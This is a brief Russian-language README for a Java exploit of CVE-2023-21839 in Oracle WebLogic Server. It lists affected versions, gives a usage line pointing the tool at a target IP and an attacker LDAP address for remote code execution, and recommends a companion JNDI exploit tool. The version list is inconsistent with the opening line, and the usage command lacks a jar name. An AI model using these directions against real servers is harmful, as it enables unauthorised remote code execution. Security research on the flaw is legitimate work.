
Эксплойт на Java для CVE-2023-21839, нацеленный на Oracle WebLogic Server версий 12.2.1.3.0 и 12.2.1.4.0 через LDAP-инъекцию для удаленного выполнения кода.
CVE-2023-21839 — велосипед, созданный на основе публичного POC в интернете
Затронутые версии
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
Использование
java -jar целевой_IP:порт LDAP-адрес
Рекомендуемый инструмент:
https://github.com/WhiteHSBG/JNDIExploit
Данный инструмент предназначен только для исследований в области сетевой безопасности (защита и атака). Пожалуйста, используйте его в соответствии с законом о сетевой безопасности!
Если пользователь использует данный инструмент для совершения незаконных атак или других противоправных действий, автор не несет за это ответственности.